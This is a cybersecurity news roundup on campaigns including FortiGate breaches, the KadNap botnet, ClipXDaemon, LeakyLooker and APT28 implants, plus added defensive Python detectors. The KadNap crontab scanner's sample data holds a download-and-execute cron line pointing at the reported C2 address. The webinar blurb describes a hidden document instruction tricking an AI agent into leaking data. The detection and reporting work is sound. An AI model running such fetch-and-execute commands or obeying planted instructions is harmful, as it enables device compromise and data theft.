2026-03-11 AI Startup News
How to Stop AI Data Leaks: A Webinar Guide to Auditing Modern Agentic Workflows
Artificial Intelligence (AI) is no longer just a tool we talk to; it is a tool that does things for us. These are called AI agents. They can send emails, move data, and even manage software on their own. But there is a problem.
While these agents make work faster, they also open a new “back door” for hackers.

The Problem: “The Invisible Employee”

Think of an AI agent as a new employee who has keys to every office in your building but no name tag. Because these agents act on their own, they often have access to sensitive information that nobody is watching. Hackers have figured this out. They don’t need to break your password anymore; they just need to trick your AI agent into doing the work for them. If your company uses AI to automate tasks, you might be at risk. Traditional security tools were built to protect humans, not “digital workers.”

In our upcoming webinar, Beyond the Model: The Expanded Attack Surface of AI Agents, Rahul Parwani, Head of Product for AI Security at Airia, will break down exactly how hackers are targeting these agents and, more importantly, how you can stop them.

What You Will Learn

The “Dark Matter” of Identity: Why AI agents are often invisible to your security team and how to find them.
How Agents Get Tricked: How a malicious instruction hidden in a document (an indirect prompt injection) can make an AI agent leak your company secrets.
The Safety Blueprint: Simple steps to give your AI agents the power they need without giving them “God Mode” over your data.

Who Should Attend?

If you are a business leader, an IT professional, or anyone responsible for keeping company data safe, this session is for you. You don’t need to be a coding expert to understand these risks. Don’t let your AI become your biggest security hole.

📅 Save Your Spot Today: Register for the Webinar Here.

This article is a contributed piece from one of our valued partners.
Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.
FortiGate Devices Exploited to Breach Networks and Steal Service Account Credentials
Cybersecurity researchers are calling attention to a new campaign in which threat actors abuse FortiGate Next-Generation Firewall (NGFW) appliances as entry points into victim networks. The activity involves exploiting recently disclosed security vulnerabilities or weak credentials to extract configuration files containing service account credentials and network topology information, SentinelOne said in a report published today. The company said the campaign has singled out environments tied to healthcare, government, and managed service providers.

“FortiGate network appliances have considerable access to the environments they were installed to protect,” security researchers Alex Delamotte, Stephen Bromfield, Mary Braden Murphy, and Amey Patne said. “In many configurations, this includes service accounts which are connected to the authentication infrastructure, such as Active Directory (AD) and Lightweight Directory Access Protocol (LDAP).”

“This setup can enable the appliance to map roles to specific users by fetching attributes about the connection that’s being analyzed and correlating with the Directory information, which is useful in cases where role-based policies are set or for increasing response speed for network security alerts detected by the device.”

However, the cybersecurity company noted that such access could be abused by attackers who break into FortiGate devices through known vulnerabilities (e.g., CVE-2025-59718, CVE-2025-59719, and CVE-2026-24858) or misconfigurations.

In one incident, the attackers are said to have breached a FortiGate appliance in November 2025, created a new local administrator account named “support,” and used it to set up four new firewall policies that allowed the account to traverse all zones without restriction. The threat actor then periodically checked that the device remained accessible, behavior consistent with an initial access broker (IAB) establishing a foothold to sell to other criminal actors. The next phase of the activity was detected in February 2026, when an attacker likely extracted the configuration file containing the encrypted LDAP service account credentials.
“Evidence demonstrates the attacker authenticated to the AD using clear text credentials from the fortidcagent service account, suggesting the attacker decrypted the configuration file and extracted the service account credentials,” SentinelOne said. The attacker then leveraged the service account to authenticate to the victim’s environment and enroll rogue workstations in the AD, allowing them deeper access. Following this step, network scanning was initiated, at which point the breach was detected, and further lateral movement was halted. In another case investigated in late January 2026, attackers swiftly moved from firewall access to deploying remote access tools like Pulseway and MeshAgent.
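As an added example (not SentinelOne’s or Fortinet’s code), the following Python audit parses a FortiGate configuration backup and flags the three artefacts described above: a local administrator account outside the approved baseline, firewall policies that accept any-to-any traffic for all addresses and services, and LDAP server entries that carry a stored bind password, which is exactly what an exfiltrated backup hands an attacker. The config excerpt is constructed in the FortiOS CLI layout (config/edit/set/next/end) and is an assumption about the backup format; the approved-admin baseline is hypothetical.

```python
"""Audit a FortiGate config backup for rogue admins, any-to-any policies and
stored LDAP bind credentials. Added example, not SentinelOne's or Fortinet's code.

Assumptions: the backup uses the FortiOS CLI layout (config / edit / set /
next / end); the approved admin baseline below is hypothetical."""
import re
from collections import defaultdict

# Constructed excerpt mirroring the report: a "support" admin and an
# unrestricted policy added by the intruder, plus the LDAP bind account.
SAMPLE_CONFIG = """\
config system admin
    edit "admin"
        set accprofile "super_admin"
        set vdom "root"
    next
    edit "support"
        set accprofile "super_admin"
        set vdom "root"
    next
end
config firewall policy
    edit 1
        set name "lan-to-wan"
        set srcintf "internal"
        set dstintf "wan1"
        set srcaddr "all"
        set dstaddr "all"
        set action accept
        set service "HTTPS"
    next
    edit 40
        set name "support-any"
        set srcintf "any"
        set dstintf "any"
        set srcaddr "all"
        set dstaddr "all"
        set action accept
        set service "ALL"
    next
end
config user ldap
    edit "corp-ad"
        set server "10.10.0.5"
        set dn "DC=corp,DC=local"
        set type regular
        set username "CN=fortidcagent,OU=svc,DC=corp,DC=local"
        set password ENC REDACTEDREDACTED
    next
end
"""

APPROVED_ADMINS = {"admin"}  # hypothetical baseline for this environment


def parse_fortios(text):
    """Return {section: {entry: {key: value}}} for top-level tables.

    Sub-tables nested inside an entry (config ... end within edit) are skipped,
    which is enough for the three checks below."""
    sections = defaultdict(dict)
    section = entry = None
    nested = 0
    for raw in text.splitlines():
        line = raw.strip()
        if nested:  # inside a sub-table: only track where it ends
            if line.startswith("config "):
                nested += 1
            elif line == "end":
                nested -= 1
            continue
        if line.startswith("config "):
            if section is None:
                section = line[len("config "):]
            else:
                nested = 1
        elif line.startswith("edit ") and section is not None:
            entry = line[len("edit "):].strip('"')
            sections[section][entry] = {}
        elif line.startswith("set ") and entry is not None:
            key, _, value = line[len("set "):].partition(" ")
            sections[section][entry][key] = value.strip('"')
        elif line == "next":
            entry = None
        elif line == "end":
            section = None
    return sections


def audit(sections):
    """Return a list of human-readable findings."""
    findings = []
    for name, a in sections.get("system admin", {}).items():
        if name not in APPROVED_ADMINS:
            findings.append(f'unexpected local admin "{name}" (profile {a.get("accprofile")})')
    for pid, p in sections.get("firewall policy", {}).items():
        if (p.get("action") == "accept" and p.get("srcintf") == "any"
                and p.get("dstintf") == "any" and p.get("srcaddr") == "all"
                and p.get("dstaddr") == "all" and p.get("service") == "ALL"):
            findings.append(f'policy {pid} "{p.get("name")}" accepts any->any for all addresses and services')
    for name, l in sections.get("user ldap", {}).items():
        if l.get("password"):  # a stored bind secret travels with every backup
            findings.append(f'ldap "{name}" stores a bind password for {l.get("username")}')
    return findings


if __name__ == "__main__":
    for f in audit(parse_fortios(SAMPLE_CONFIG)):
        print("FINDING:", f)
```

Run it against a fresh backup after any suspected compromise and diff the admin and policy tables against the last known-good export; the LDAP finding is not a misconfiguration in itself, it is a reminder that the backup must be treated as a credential store and that the bind account’s password should be rotated whenever the appliance is suspected compromised.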
In addition, the threat actor used PowerShell to download malware from a cloud storage bucket hosted on Amazon Web Services (AWS) infrastructure. The Java malware, launched via DLL side-loading, was used to exfiltrate the contents of the NTDS.dit file and the SYSTEM registry hive to an external server (“172.67.196[.]232”) over port 443. “While the actor may have attempted to crack passwords from the data, no such credential usage was identified between the time of credential harvesting and incident containment,” SentinelOne added. “NGFW appliances have become ubiquitous because they provide strong network monitoring capabilities for organizations by integrating security controls of a firewall with other management features, such as AD,” it added.
“However, these devices are high-value targets for actors with a variety of motivations and skill levels, from state-aligned actors conducting espionage to financially motivated attacks such as ransomware.”
KadNap Malware Infects 14,000+ Edge Devices to Power Stealth Proxy Botnet
Cybersecurity researchers have discovered a new malware called KadNap that’s primarily targeting Asus routers to enlist them into a botnet for proxying malicious traffic. The malware, first detected in the wild in August 2025, has expanded to over 14,000 infected devices, with more than 60% of victims located in the U.S., according to the Black Lotus Labs team at Lumen. A lesser number of infections have been detected in Taiwan, Hong Kong, Russia, the U.K., Australia, Brazil, France, Italy, and Spain. “KadNap employs a custom version of the Kademlia Distributed Hash Table (DHT) protocol, which is used to conceal the IP address of their infrastructure within a peer-to-peer system to evade traditional network monitoring,” the cybersecurity company said in a report shared with The Hacker News.
Compromised nodes in the network leverage the DHT protocol to locate and connect with a command-and-control (C2) server, thereby making it resilient to detection and disruption efforts. Once devices are successfully compromised, they are marketed by a proxy service named Doppelgänger (“doppelganger[.]shop”), which is assessed to be a rebrand of Faceless, another proxy service associated with TheMoon malware. Doppelgänger, according to its website, claims to offer resident proxies in over 50 countries that provide “100% anonymity.” The service is said to have launched in May/June 2025. Despite the focus on Asus routers, the operators of KadNap have been found to deploy the malware against an assorted set of edge networking devices.
Central to the attack is a shell script (“aic.sh”) that’s downloaded from the C2 server (“212.104.141[.]140”), which is responsible for initiating the process of conscripting the victim to the P2P network. The file creates a cron job to retrieve the shell script from the server at the 55-minute mark of every hour, rename it to “.asusrouter,” and run it. Once persistence is established, the script pulls a malicious ELF file, renames it to “kad,” and executes it. This, in turn, leads to the deployment of KadNap.
The malware is capable of targeting devices running both ARM and MIPS processors. KadNap is also designed to connect to a Network Time Protocol (NTP) server to fetch the current time and store it along with the host uptime. This information serves as the basis for a hash that’s used to locate other peers in the decentralized network to receive commands or download additional files. The files fwr.sh and /tmp/.sose contain functionality to close port 22, the standard TCP port for Secure Shell (SSH), on the infected device and to extract a list of C2 IP address:port combinations to connect to.
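Added example (not Lumen’s code): a Python check that applies the persistence details above to a router’s crontab. It parses each entry and flags the hourly minute-55 schedule, download-then-execute chains that pull from a bare-IP URL, the reported C2 address, and the file names the report gives (aic.sh, .asusrouter, kad, fwr.sh, .sose). The crontab lines are constructed for illustration; the exact command the real script installs is not published on this page.

```python
"""Flag KadNap-style cron persistence on an edge device.
Added example, not Lumen/Black Lotus Labs code. Sample crontab is constructed."""
import re

IOC_NAMES = {"aic.sh", ".asusrouter", "kad", "fwr.sh", ".sose"}  # from the report
IOC_C2 = {"212.104.141.140"}                                      # from the report

DOWNLOADER = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
BARE_IP_URL = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})")
EXEC_AFTER = re.compile(r"(?:&&|;|\|)\s*(?:sh|ash|bash|\./|chmod\s+\+?x)")

SAMPLE_CRONTAB = """\
# constructed crontab for illustration
0 3 * * * /sbin/logrotate
55 * * * * wget -q -O /tmp/.asusrouter http://212.104.141[.]140/aic.sh && sh /tmp/.asusrouter
*/10 * * * * curl -s https://updates.example.com/health >/dev/null
"""


def refang(s):
    """Turn defanged indicators (a[.]b, hxxp) back into matchable text."""
    return s.replace("[.]", ".").replace("hxxp", "http")


def parse_cron(line):
    """Return (schedule, command) or None for blank/comment/malformed lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = line.split(None, 5)
    if len(parts) < 6:
        return None
    return " ".join(parts[:5]), parts[5]


def assess_cron(line):
    """Return the list of reasons a crontab line looks like KadNap persistence."""
    parsed = parse_cron(refang(line))
    if not parsed:
        return []
    schedule, cmd = parsed
    reasons = []
    fields = schedule.split()
    if fields[0] == "55" and fields[1:] == ["*"] * 4:
        reasons.append("runs at minute 55 of every hour (KadNap schedule)")
    ip = BARE_IP_URL.search(cmd)
    if DOWNLOADER.search(cmd) and ip:
        reasons.append(f"downloads from bare-IP URL {ip.group(1)}")
        if ip.group(1) in IOC_C2:
            reasons.append("known KadNap C2")
        if EXEC_AFTER.search(cmd):
            reasons.append("executes what it downloaded")
    for name in sorted(IOC_NAMES):
        if re.search(r"(?:^|[\s/])" + re.escape(name) + r"(?:\s|$)", cmd):
            reasons.append(f"references KadNap file name {name}")
    return reasons


def scan_crontab(text):
    """Return [(line, reasons)] for every entry with at least one reason."""
    hits = []
    for line in text.splitlines():
        reasons = assess_cron(line)
        if reasons:
            hits.append((line, reasons))
    return hits


if __name__ == "__main__":
    for line, reasons in scan_crontab(SAMPLE_CRONTAB):
        print(line)
        for r in reasons:
            print("  -", r)
```

On a real device you would feed it the output of `crontab -l` (or the contents of /var/spool/cron on busybox-based firmware) and pair it with a look at /tmp for the listed file names and an `ss`/`netstat` check that port 22 is still listening.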
“In short, the innovative use of the DHT protocol allows the malware to establish robust communication channels that are difficult to disrupt, by hiding in the noise of legitimate peer-to-peer traffic,” Lumen said. Further analysis has determined that not all compromised devices communicate with every C2 server, indicating the infrastructure is being categorized based on device type and models. The Black Lotus Labs team told The Hacker News that Doppelgänger’s bots are being abused by threat actors in the wild. “One issue there has been since these Asus (and other devices) are also sometimes co-infected with other malware, it is tricky to say who exactly is responsible for a specific malicious activity,” the company said.
Users running SOHO routers are advised to keep their devices up to date, reboot them regularly, change default passwords, secure management interfaces, and replace models that are end-of-life and no longer supported. “The KadNap botnet stands out among others that support anonymous proxies in its use of a peer-to-peer network for decentralized control,” Lumen concluded. “Their intention is clear, avoid detection and make it difficult for defenders to protect against.”

New Linux Threat ClipXDaemon Emerges

The disclosure comes as Cyble detailed a new Linux threat dubbed ClipXDaemon that targets cryptocurrency users by intercepting and altering copied wallet addresses. The clipper malware, delivered via a Linux post-exploitation framework called ShadowHS, has been described as an autonomous cryptocurrency clipboard hijacker targeting Linux X11 environments.
Staged entirely in memory, the malware employs stealth techniques, such as process masquerading and Wayland session avoidance, while simultaneously monitoring the clipboard every 200 milliseconds and substituting cryptocurrency addresses with attacker-controlled wallets. It’s capable of targeting Bitcoin, Ethereum, Litecoin, Monero, Tron, Dogecoin, Ripple, and TON wallets. The decision to avoid execution in Wayland sessions is deliberate, as the display server protocol’s security architecture places additional controls, like requiring explicit user interaction, before applications can access the clipboard content. In disabling itself under such scenarios, the malware aims to eliminate noise and avoid runtime failure.
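As an added example (not Cyble’s analysis code), here is the defensive mirror image of the behaviour described above: a small clipboard guard that recognises the address formats ClipXDaemon targets and raises an alert when the clipboard’s address changes shortly after it was set, which is the footprint a 200-millisecond polling clipper leaves. The address regexes are approximations of each chain’s format, and the one-second window and sample addresses are constructed; on a real X11 host you would feed `observe()` from a periodic `xclip -o -selection clipboard` read.

```python
"""Clipboard-swap guard for the coins ClipXDaemon targets.
Added example, not Cyble's code. Address regexes are approximations;
the timing window and sample addresses are constructed."""
import re

ADDRESS_PATTERNS = {
    "BTC":  r"\b(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[a-z0-9]{25,62})\b",
    "ETH":  r"\b0x[a-fA-F0-9]{40}\b",
    "LTC":  r"\b(?:[LM][a-km-zA-HJ-NP-Z1-9]{26,33}|ltc1[a-z0-9]{25,62})\b",
    "XMR":  r"\b4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}\b",
    "TRX":  r"\bT[1-9A-HJ-NP-Za-km-z]{33}\b",
    "DOGE": r"\bD[5-9A-HJ-NP-U][1-9A-HJ-NP-Za-km-z]{32}\b",
    "XRP":  r"\br[1-9A-HJ-NP-Za-km-z]{24,34}\b",
    "TON":  r"\b[EU]Q[A-Za-z0-9_-]{46}\b",
}
COMPILED = {chain: re.compile(p) for chain, p in ADDRESS_PATTERNS.items()}


def find_addresses(text):
    """Return [(chain, address)] for every recognised address in text."""
    return [(chain, m.group(0))
            for chain, pat in COMPILED.items()
            for m in pat.finditer(text)]


def detect_swap(copied, clipboard):
    """Return (chain, original, replacement) if an address of the same chain
    was substituted between the two clipboard states, else None."""
    if copied == clipboard:
        return None
    before = dict(find_addresses(copied))
    after = dict(find_addresses(clipboard))
    for chain, orig in before.items():
        new = after.get(chain)
        if new and new != orig:
            return chain, orig, new
    return None


class ClipboardGuard:
    """Alert when a clipboard address changes within `window` seconds of being set.

    A clipper polling every 200 ms rewrites the address almost immediately after
    the user copies it, so the swap lands inside the window; a user copying a
    different address minutes later does not."""

    def __init__(self, window=1.0):
        self.window = window
        self.last_value = None
        self.last_ts = None

    def observe(self, value, ts):
        """Record the current clipboard text at time ts; return a swap alert or None."""
        alert = None
        if self.last_value is not None and ts - self.last_ts <= self.window:
            alert = detect_swap(self.last_value, value)
        self.last_value, self.last_ts = value, ts
        return alert


if __name__ == "__main__":
    guard = ClipboardGuard()
    victim = "pay 0x" + "1" * 40   # constructed address
    swapped = "pay 0x" + "2" * 40  # what a clipper would write back
    print(guard.observe(victim, 0.0))   # first sighting, nothing to compare
    print(guard.observe(swapped, 0.2))  # swap within the window: alert
```

The guard cannot tell a user’s copy from the malware’s write on its own; what it keys on is the timing, because a legitimate user does not replace one Ethereum address with another 200 ms after copying the first. Under Wayland the same guard would need the compositor’s cooperation to read the clipboard at all, which is the restriction the malware is sidestepping by staying out of Wayland sessions.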
“ClipXDaemon differs fundamentally from traditional Linux malware. It contains no command-and-control (C2) logic, performs no beaconing, and requires no remote tasking,” the company said. “Instead, it monetizes victims directly by hijacking cryptocurrency wallet addresses copied in X11 sessions and replacing them in real time with attacker-controlled addresses.”
New “LeakyLooker” Flaws in Google Looker Studio Could Enable Cross-Tenant SQL Queries
Cybersecurity researchers have disclosed nine cross-tenant vulnerabilities in Google Looker Studio that could have permitted attackers to run arbitrary SQL queries on victims’ databases and exfiltrate sensitive data within organizations’ Google Cloud environments. The shortcomings have been collectively named LeakyLooker by Tenable. There is no evidence that the vulnerabilities were exploited in the wild. Following responsible disclosure in June 2025, the issues have been addressed by Google.
The list of security flaws is as follows -

- Cross Tenant Unauthorized Access - Zero-Click SQL Injection on Database Connectors
- Cross Tenant Unauthorized Access - Zero-Click SQL Injection Through Stored Credentials
- Cross Tenant SQL Injection on BigQuery Through Native Functions
- Cross-Tenant Data Sources Leak With Hyperlinks
- Cross Tenant SQL Injection on Spanner and BigQuery Through Custom Queries on a Victim’s Data Source
- Cross Tenant SQL Injection on BigQuery and Spanner Through the Linking API
- Cross-Tenant Data Sources Leak With Image Rendering
- Cross-Tenant XS Leak on Arbitrary Data Sources With Frame Counting and Timing Oracles
- Cross Tenant Denial of Wallet Through BigQuery

“The vulnerabilities broke fundamental design assumptions, revealed a new attack class, and could have allowed attackers to exfiltrate, insert, and delete data in victims’ services and Google Cloud environment,” security researcher Liv Matan said in a report shared with The Hacker News. “These vulnerabilities exposed sensitive data across Google Cloud Platform (GCP) environments, potentially affecting any organization using Google Sheets, BigQuery, Spanner, PostgreSQL, MySQL, Cloud Storage, and almost any other Looker Studio data connector.”

Successful exploitation of the cross-tenant flaws could enable threat actors to gain access to entire datasets and projects across different cloud tenants. Attackers could scan for public Looker Studio reports or obtain access to private ones that use these connectors (e.g., BigQuery) and seize control of the databases, allowing them to run arbitrary SQL queries across the owner’s entire GCP project. Alternatively, a victim creates a report as public or shares it with a specific recipient, and uses a JDBC-connected data source such as PostgreSQL.
In this scenario, the attacker can take advantage of a logic flaw in the copy report feature that makes it possible to clone reports while retaining the original owner’s credentials, enabling them to delete or modify tables. Another high-impact path detailed by the cybersecurity company involved one-click data exfiltration, where sharing a specially crafted report forces a victim’s browser to execute malicious code that contacts an attacker-controlled project to reconstruct entire databases from logs. “The vulnerabilities broke the fundamental promise that a ‘Viewer’ should never be able to control the data they are viewing,” Matan said, adding they “could have let attackers exfiltrate or modify data across Google services like BigQuery and Google Sheets.”
The Zero-Day Scramble is Avoidable: A Guide to Attack Surface Reduction
You can’t control when the next critical vulnerability drops. You can control how much of your environment is exposed when it does. The problem is that most teams have more internet-facing exposure than they realise. Intruder’s Head of Security digs into why this happens and how teams can manage it deliberately.
Time-to-exploit is shrinking

The larger and less controlled your attack surface is, the more opportunities exist for exploitation. And the window to act on them is shrinking fast. For the most serious vulnerabilities, disclosure to exploitation can be as short as 24 to 48 hours. Zero Day Clock projects that time-to-exploit will be just minutes by 2028.
That’s not a lot of time when you consider what has to happen before a patch is deployed: running scans, waiting for results, raising tickets, agreeing priorities, implementing the fix, and verifying it. If disclosure lands out of hours, it takes even longer. In many cases, vulnerable systems don’t need to be internet-facing in the first place. With visibility of the attack surface, teams can reduce unnecessary exposure upfront and avoid the scramble altogether when a new vulnerability drops.
When a zero-day drops on a Saturday

ToolShell was an unauthenticated remote code execution vulnerability in Microsoft SharePoint. If an attacker could reach it, they could run code on your server - and because SharePoint is Active Directory-connected, they’d be starting in a highly sensitive part of your environment. This was a zero-day, meaning attackers were exploiting it before a patch was available. Microsoft disclosed on a Saturday and confirmed that Chinese state-sponsored groups had been exploiting it for up to two weeks before that. By the time most teams knew about it, opportunistic attackers were scanning for exposed instances and exploiting at scale. Intruder’s research found thousands of publicly accessible SharePoint instances at the time of disclosure - despite the fact that SharePoint doesn’t need to be internet-facing. Every one of those exposures was unnecessary - and every unpatched server was an open door.

Why exposures get missed

So why do exposures so often get missed by security teams?
In a typical external scan, informational findings sit beneath hundreds of criticals, highs, mediums, and lows. But that information can include detections that represent real exposure risk, such as:

- An exposed SharePoint server
- A database exposed to the internet, such as MySQL or Postgres
- Other protocols that should usually be reserved for the internal network, such as RDP and SNMP

Here’s a real example of what that looks like:

In vulnerability scanning terms, classifying these as informationals sometimes makes sense. If the scanner sits on the same private subnet as the targets, an exposed service might genuinely be low risk. But when that same service is exposed to the internet, it carries real risk even without a known vulnerability attached to it yet. The danger is that traditional scan reports treat both cases the same way, so the real risks slip through the gaps.

What proactive attack surface reduction actually involves

There are three key elements to making attack surface reduction work in practice.

1. Asset discovery: define your attack surface

Before you can reduce your attack surface, you need a clear picture of what you own and what’s externally reachable. That starts with identifying shadow IT - systems your organization owns or operates but isn’t currently scanning or monitoring. Closing that gap is important, and there are three key elements we recommend having in place:

- Integrating with your cloud and DNS providers so that when new infrastructure is created, it’s automatically picked up and scanned. This is one area where defenders have a genuine advantage: you can integrate directly with your own environments; attackers can’t.
- Using subdomain enumeration to surface externally reachable hosts that aren’t in your inventory. This matters especially after acquisitions, where you may be inheriting infrastructure you don’t yet have visibility of.
- Identifying infrastructure hosted with smaller, unknown cloud providers. You may have a security policy that mandates development teams only use your primary cloud provider, but you need to check that practice is being followed.
2. Treat exposure as risk

The next step is treating attack surface exposure as a risk category in its own right. That requires a detection capability that identifies which informational findings represent an exposure and assigns appropriate severity. An exposed SharePoint instance, for example, might reasonably be treated as a medium-risk issue. It also means carving out space for this work in how you prioritize. If strategic efforts like attack surface reduction are always competing against urgent patching, they will always lose. That might mean setting aside time each quarter to review and reduce exposure, or assigning clear ownership so someone is accountable for it - not just when a crisis hits, but routinely.

3. Continuous monitoring

Attack surface reduction isn’t a one-time exercise. Exposure changes constantly - a firewall rule gets edited, a new service gets deployed, a subdomain gets forgotten - and your team needs to detect those changes quickly. Vulnerability scans take time to complete, and running full scans daily isn’t usually possible. Daily port scanning is a better fit. It’s lightweight, fast, and means you can detect newly exposed services as they appear. If someone edits a firewall rule and accidentally exposes Remote Desktop, you find out the day it happens - not at the next scheduled scan, which could be up to a month later.

Fewer exposed services, fewer surprises

When unnecessary services aren’t exposed in the first place, they’re far less likely to be caught up in the mass exploitation that follows a critical disclosure. That means fewer surprises, less urgent scrambling, and more time to respond deliberately when new vulnerabilities emerge.
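Added example (not Intruder’s tooling): a Python script that does what steps 2 and 3 above describe, diffing two daily port-scan snapshots to surface newly exposed services and assigning a severity that reflects internet exposure rather than the scanner’s “informational” label. The snapshot lines are constructed (host, port/proto, state, service and optional tags, loosely modelled on nmap’s grepable output, which is an assumption), and the severity table is a starting point to tune, with SharePoint at medium as the article suggests.

```python
"""Diff daily port-scan snapshots and rate newly exposed services.
Added example, not Intruder's code. Snapshot lines are constructed:
"<host> <port>/<proto> <state> <service> [tags...]"."""

# Exposure severity for an internet-facing host; tune for your environment.
EXPOSURE_SEVERITY = {
    "ms-wbt-server": "high",   # RDP
    "postgresql": "high",
    "mysql": "high",
    "snmp": "medium",
    "sharepoint": "medium",    # the article's suggested rating
    "ssh": "low",
}
RANK = {"info": 0, "low": 1, "medium": 2, "high": 3}

SCAN_DAY1 = """\
203.0.113.10 443/tcp open https
203.0.113.10 22/tcp open ssh
203.0.113.20 443/tcp open https sharepoint
"""
SCAN_DAY2 = """\
203.0.113.10 443/tcp open https
203.0.113.10 22/tcp open ssh
203.0.113.10 3389/tcp open ms-wbt-server
203.0.113.20 443/tcp open https sharepoint
203.0.113.30 5432/tcp open postgresql
"""


def parse_scan(text):
    """Return {(host, port/proto): [service, tags...]} for open ports only."""
    exposed = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 4 and parts[2] == "open":
            exposed[(parts[0], parts[1])] = parts[3:]
    return exposed


def classify(tags, internet_facing=True):
    """Severity of an exposed service. The same service seen from an internal
    scanner stays informational, which is the distinction scan reports miss."""
    if not internet_facing:
        return "info"
    best = "info"
    for tag in tags:
        sev = EXPOSURE_SEVERITY.get(tag, "info")
        if RANK[sev] > RANK[best]:
            best = sev
    return best


def new_exposures(prev_text, cur_text, internet_facing=True):
    """Services open today that were not open yesterday, with severity."""
    prev, cur = parse_scan(prev_text), parse_scan(cur_text)
    return [(host, port, " ".join(cur[(host, port)]),
             classify(cur[(host, port)], internet_facing))
            for host, port in sorted(set(cur) - set(prev))]


def exposure_report(text, internet_facing=True):
    """Every open service in a snapshot, highest severity first."""
    cur = parse_scan(text)
    rows = [(classify(tags, internet_facing), host, port, " ".join(tags))
            for (host, port), tags in cur.items()]
    return sorted(rows, key=lambda r: (-RANK[r[0]], r[1], r[2]))


if __name__ == "__main__":
    for host, port, svc, sev in new_exposures(SCAN_DAY1, SCAN_DAY2):
        print(f"NEW {sev.upper():6} {host} {port} {svc}")
```

The two-snapshot diff is what turns a port scan into a change alert: the RDP port that appears on day two is exactly the accidentally edited firewall rule described above, and it surfaces as high rather than as one informational line among hundreds.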
Intruder automates this process - from discovering shadow IT and monitoring for new exposures, to alerting your team the moment something changes - so your security team can stay ahead of exposure rather than reacting to it. If you want to see what’s exposed in your environment, book a demo of Intruder.

This article is a contributed piece from one of our valued partners.
APT28 Uses BEARDSHELL and COVENANT Malware to Spy on Ukrainian Military
The Russian state-sponsored hacking group tracked as APT28 has been observed using a pair of implants dubbed BEARDSHELL and COVENANT to facilitate long‑term surveillance of Ukrainian military personnel. The two malware families have been put to use since April 2024, ESET said in a new report shared with The Hacker News. APT28, also tracked as Blue Athena, BlueDelta, Fancy Bear, Fighting Ursa, Forest Blizzard (formerly Strontium), FROZENLAKE, Iron Twilight, ITG05, Pawn Storm, Sednit, Sofacy, and TA422, is a nation-state actor affiliated with Unit 26165 of the Russian Federation’s military intelligence agency GRU. The threat actor’s malware arsenal consists of tools like BEARDSHELL and COVENANT, along with another program codenamed SLIMAGENT that’s capable of logging keystrokes, capturing screenshots, and collecting clipboard data.
SLIMAGENT was first publicly documented by the Computer Emergency Response Team of Ukraine (CERT-UA) in June 2025. SLIMAGENT, per the Slovakian cybersecurity company, has its roots in XAgent, another implant used by APT28 in the 2010s to facilitate remote control and data exfiltration. This is based on code similarities discovered between SLIMAGENT and previously unknown samples deployed in attacks targeting governmental entities in two European countries as far back as 2018. It’s assessed that the 2018 artifacts and the 2024 SLIMAGENT sample originated from XAgent, with ESET’s analysis uncovering overlaps in the keylogging between SLIMAGENT and an XAgent sample detected in the wild in late 2014.
“SLIMAGENT emits its espionage logs in the HTML format, with the application name, the logged keystrokes, and the window name in blue, red, and green, respectively,” ESET said. “The XAgent keylogger also produces HTML logs using the same color scheme.”

Code comparison between SLIMAGENT (left) and XAgent (right)

Also deployed in connection with SLIMAGENT is another backdoor referred to as BEARDSHELL that’s capable of executing PowerShell commands on compromised hosts. It uses the legitimate cloud storage service Icedrive for command-and-control (C2). A noteworthy aspect of the malware is that it utilizes a distinctive obfuscation technique referred to as opaque predicate, which is also found in XTunnel (aka X-Tunnel), a network traversal and pivoting tool used by APT28 in the 2016 Democratic National Committee (DNC) hack.
The tool provides a secure tunnel to an external C2 server. “The shared use of this rare obfuscation technique, combined with its colocation with SLIMAGENT, leads us to assess with high confidence that BEARDSHELL is part of Sednit’s custom arsenal,” ESET added. A third major piece of the threat actor’s toolkit is COVENANT, an open-source .NET post-exploitation framework that has been “heavily” modified to support long-term espionage and to implement a new cloud-based network protocol that abuses the Filen cloud storage service for C2 since July 2025. Previously, APT28’s COVENANT variant was said to have used pCloud (in 2023) and Koofr (in 2024-2025).
“These adaptations show that Sednit developers acquired deep expertise in Covenant – an implant whose official development ceased in April 2021 and may have been considered unused by defenders,” ESET said. “This surprising operational choice appears to have paid off: Sednit has successfully relied on Covenant for several years, particularly against selected targets in Ukraine.” This is not the first time the adversarial collective has embraced the dual-implant strategy. In 2021, Trellix revealed that APT28 deployed Graphite, a backdoor that employed OneDrive for C2, and PowerShell Empire in attacks targeting high-ranking government officials overseeing national security policy and individuals in the defense sector in Western Asia.
Threat Actors Mass-Scan Salesforce Experience Cloud via Modified AuraInspector Tool
Salesforce has warned of an increase in threat actor activity that’s aimed at exploiting misconfigurations in publicly accessible Experience Cloud sites by making use of a customized version of an open-source tool called AuraInspector. The activity, per the company, involves the exploitation of customers’ overly permissive Experience Cloud guest user configurations to obtain access to sensitive data. “Evidence indicates the threat actor is leveraging a modified version of the open-source tool AuraInspector […] to perform mass scanning of public-facing Experience Cloud sites,” Salesforce said. “While the original AuraInspector is limited to identifying vulnerable objects by probing API endpoints that these sites expose (specifically the /s/sfsites/aura endpoint), the actor has developed a custom version of the tool capable of going beyond identification to actually extract data — exploiting overly permissive guest user settings.” AuraInspector is an open-source tool designed to help security teams identify and audit access control misconfigurations within the Salesforce Aura framework.
It was released by Google-owned Mandiant in January 2026. Publicly accessible Salesforce sites use a dedicated guest user profile that enables an unauthenticated user to access landing pages, FAQs, and knowledge articles. However, if this profile is misconfigured with excessive permissions, it can potentially grant unauthenticated users access to more data than intended. As a result, an attacker could exploit this security weakness to directly query Salesforce CRM objects without logging in.
For this attack to work, two conditions have to hold on the customer side: the Experience Cloud site uses the guest user profile, and the customer has not followed Salesforce’s recommended configuration guidance. “At this time, we have not identified any vulnerability inherent to the Salesforce platform associated with this activity,” Salesforce said. “These attempts are focused on customer configuration settings that, if not properly secured, may increase exposure.” The company attributed the campaign to a known threat actor group without naming it, raising the possibility that it is the work of ShinyHunters (aka UNC6240), which has a history of targeting Salesforce environments via third-party applications from Salesloft and Gainsight. Salesforce is recommending that customers review their Experience Cloud guest user settings, ensure Default External Access for all objects is set to Private, disable guest users’ access to public APIs, restrict visibility settings so guest users cannot enumerate internal organization members, disable self-registration if it is not required, and monitor logs for unusual queries.
